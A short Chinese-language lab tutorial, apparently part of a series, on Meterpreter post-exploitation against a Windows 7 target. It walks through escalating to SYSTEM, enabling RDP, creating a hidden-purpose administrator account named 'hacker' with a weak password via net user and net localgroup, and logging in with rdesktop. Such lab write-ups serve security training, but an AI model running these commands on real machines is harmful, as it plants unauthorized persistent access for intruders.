学习目标
学习利用Meterpreter后渗透阶段模块来开启靶机远程桌面
实验环境
攻击机:kali
靶机:windows7
实验内容
步骤一:建立session
跟 上篇文章 步骤一样
步骤二:后渗透之开启远程桌面
1.将当前session会话提升到system权限
命令:getsystem
2.启动目标机的远程桌面协议,对应3389端口
命令:run post/windows/manage/enable_rdp
3.靶机中新建一个账号便于我们登录,并给它分配管理员权限(使用),然后将其添加到"远程桌面用户"组中,首先进入shell
命令:shell
添加用户命令:net user hacker 123123 /add
加入用户组命令:net localgroup administrators hacker /add
4.在kaili中新建一个终端,利用rdesktop对靶机进行远程桌面连接
命令:rdesktop 靶机IP
5.使用刚创建的用户进行登录:hacker/123123
6.登录成功